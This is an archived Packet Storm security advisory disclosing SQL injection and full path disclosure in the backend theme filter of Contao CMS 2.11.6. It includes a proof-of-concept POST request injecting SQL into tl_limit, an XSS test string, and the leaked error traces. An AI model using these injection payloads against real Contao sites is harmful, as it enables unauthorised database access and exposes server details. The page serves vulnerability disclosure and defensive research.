what you don't know can hurt you

Contao 2.11.6 Path Disclosure

Contao 2.11.6 Path Disclosure
Posted Oct 25, 2012
Authored by aulmn

Errors thrown from manipulated SQL queries in Contao version 2.11.6 leak full path disclosure information.

tags | exploit, info disclosure
MD5 | 0cc5b9b7375d803cd99071fa2e4cc828

Contao 2.11.6 Path Disclosure

Change Mirror Download
_________________________________________________________________________
title: Contao 2.11.6 Multiple vulnerabilities
vulnerable version: 2.11.6
impact: medium
homepage: www.contao.org
found: 23.10.2012
by: aulmn
_________________________________________________________________________

Vendor description:
Contao is an open source content management system (CMS) for people
who want a professional internet presence that is easy to maintain.

_________________________________________________________________________

Vulnerability overview/description:

Because of wrong validation of filter.x parameter, there is possible of
sql-leak.
Vulnerability exists for logged-in users (not confirmed to pre-auth).

_________________________________________________________________________

Proof of concept:
1) to get to know 'what-is-the-validation-here', just work with payload for
filter.x parameter:
Sample output will be like this:
"
Fatal error: Uncaught exception Exception with message Query error:
Undeclared variable: XSS (SELECT * FROM tl_theme ORDER BY name LIMIT
XSS Example$(function() {$('#users').each(function() {var select =
$(this);var
option=select.children('option').first();select.after(option.text());select.hide();});});
[lt]script[gt]alert('xss');[lt]/script[gt],30)
thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line
686"


2) To make sql-leak here:
Request to vulnerable Contao CMS should look like this:
---8<---
POST /contao/contao-2.11.6/contao/main.php?do=themes HTTP/1.1
Host: 192.168.64.106

FORM_SUBMIT=tl_filters&REQUEST_TOKEN=tokenhere&filter.x=9&filter.y=5&tl_limit=1+or+1+in+(select+version())&tl_field=author&tl_value=&tl_sort=name
---8<---
...to see response like this:
---8<---

Fatal error: Uncaught exception Exception with message Query error: You
have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'or 1 in (select
version()),30' at line 1 (SELECT * FROM tl_theme ORDER BY name LIMIT 1 or 1
in (select version()),30) thrown in
/home/contao/contao-2.11.6/system/libraries/Database.php on line 686

#0 /home/contao/contao-2.11.6/system/libraries/Database.php(633):
Database_Statement->query()
#1 /home/contao/contao-2.11.6/system/drivers/DC_Table.php(3831):
Database_Statement->execute(Array)
#2 /home/contao/contao-2.11.6/system/drivers/DC_Table.php(344):
DC_Table->listView()
#3 /home/contao/contao-2.11.6/system/modules/backend/Backend.php(287):
DC_Table->showAll()
#4 /home/contao/contao-2.11.6/contao/main.php(120):
Backend->getBackendModule('themes')
#5 /home/contao/contao-2.11.6/contao/main.php(230): Main->run()
#6 {main}

---8<---
(or:

Fatal error: Uncaught exception Exception with message Query error: Got
error 'empty (sub)expression' from regexp (SELECT COUNT(*) AS total FROM
tl_theme WHERE LOWER(CAST(author AS CHAR)) REGEXP LOWER('xxxlalala'))
thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line
686


...or:

Fatal error: Uncaught exception Exception with message Too few arguments to
build the query string thrown in
/home/contao/contao-2.11.6/system/libraries/Database.php on line 717

)

So like You see we have a nice sql-leak here. (Try to comment out rest of
the line in attack string;))
_________________________________________________________________________

Vulnerable / tested versions:

2.11.6
Vulnerable parameters seems to be:
tl_limit
filter.x
tl_value
tl_sort



_________________________________________________________________________
The vulnerability is verified to exist in 2.11.6,
which is the most recent version at the time of discovery.

_________________________________________________________________________
Vendor contact timeline:
Nope.


_________________________________________________________________________
Solution:
Think about it.


_________________________________________________________________________
Advisory URL:
Here.

_________________________________________________________________________
Contact:

areulikemenow@gmail.com
aulmn.blogspot.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close